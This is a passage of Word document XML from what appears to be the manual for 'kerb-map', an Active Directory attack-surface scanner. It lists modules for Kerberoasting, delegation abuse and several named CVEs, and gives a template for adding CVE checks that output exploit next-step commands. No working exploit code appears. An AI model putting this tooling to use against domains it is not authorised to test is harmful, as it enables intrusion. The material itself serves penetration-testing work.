      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Export the final scan to JSON for your engagement report. The JSON file contains every finding, score, evidence, and next-step command in a structured format ready for report generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="11__Project_Structure" w:id="68"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Project Structure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The kerb-map project follows a modular structure. Each scanner, auditor, and CVE check is implemented as an independent Python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kerb-map/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── kerb-map.py              # Main entry point and CLI argument parser</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── requirements.txt          # Python dependencies</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── README.md                 # Project overview</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── config/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── scoring.py            # Score weights and thresholds</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── defaults.py           # Default settings</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── core/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── auth.py               # Authentication handler (password, hash, ccache)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── ldap_client.py        # LDAP connection and query wrapper</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── scorer.py             # Priority engine and next-step generator</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── exporter.py           # JSON, BloodHound, and history export</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── modules/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── spn_scanner.py        # SPN discovery and Kerberoast scoring</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── asrep_scanner.py      # AS-REP roastable account detection</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── delegation_mapper.py  # Unconstrained, constrained, RBCD mapping</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── user_enumerator.py    # Privileged users, stale accounts, policy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── enc_auditor.py        # Encryption type auditing (v1.1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── trust_mapper.py       # Domain and forest trust mapping (v1.1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">├── cves/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── nopac.py              # CVE-2021-42278 / CVE-2021-42287</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── adcs.py               # AD CS ESC1–ESC8</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── zerologon.py          # CVE-2020-1472</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── printnightmare.py     # CVE-2021-1675 / CVE-2021-34527</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── petitpotam.py         # CVE-2021-36942</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── ms14_068.py           # CVE-2014-6324</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── gpp_passwords.py      # MS14-025 (v1.1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── bronze_bit.py         # CVE-2020-17049 (v1.1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   ├── certifried.py         # CVE-2022-26923 (v1.1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">│   └── ldap_signing.py       # LDAP signing check (v1.1)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">└── output/</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    ├── terminal.py           # Rich terminal formatter</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    ├── json_export.py        # Structured JSON writer</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    ├── bloodhound_export.py  # BloodHound JSON/ZIP generator</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    └── history.py            # SQLite scan history manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="200" w:before="120"/>
      </w:pPr>
      <w:bookmarkStart w:name="12__Extending_kerb_map" w:id="69"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">12. Extending kerb-map</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="12_1_Adding_a_New_CVE_Module" w:id="70"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">12.1 Adding a New CVE Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">To add a new CVE check, create a Python file in the cves/ directory that follows the standard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 cves/new_vuln.py</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from core.ldap_client import LDAPClient</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">from core.scorer import Finding</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class NewVulnCheck:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    NAME = 'new_vuln'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    CVE = 'CVE-YYYY-XXXXX'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    AGGRESSIVE = False</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def __init__(self, ldap: LDAPClient):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        self.ldap = ldap</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    def check(self) -&gt; list[Finding]:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        results = self.ldap.search('(objectClass=...)', ['attr1'])</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        findings = []</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        for entry in results:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">            if self._is_vulnerable(entry):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                findings.append(Finding(</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                    type='new_vuln', score=80,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                    target=entry.name,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                    details='Why this is vulnerable',</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                    next_step='command to exploit'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">                ))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">        return findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Then register the module in kerb-map.py by adding it to the CVE_MODULES list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="12_2_Adding_a_New_Enumeration_Module" w:id="71"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">12.2 Adding a New Enumeration Module</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration modules follow the same pattern but are placed in the modules/ directory. They should return a list of Finding objects with appropriate scores and next-step commands. Register the module in the ENUM_MODULES list and add a CLI flag in the argument parser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="100"/>
      </w:pPr>
      <w:bookmarkStart w:name="12_3_Customising_the_Scorer" w:id="72"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">12.3 Customising the Scorer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The scoring weights are defined in config/scoring.py. The scorer uses a weighted sum approach, so changing a single weight shifts that finding type relative to all others. After modifying weights, run the included test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2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
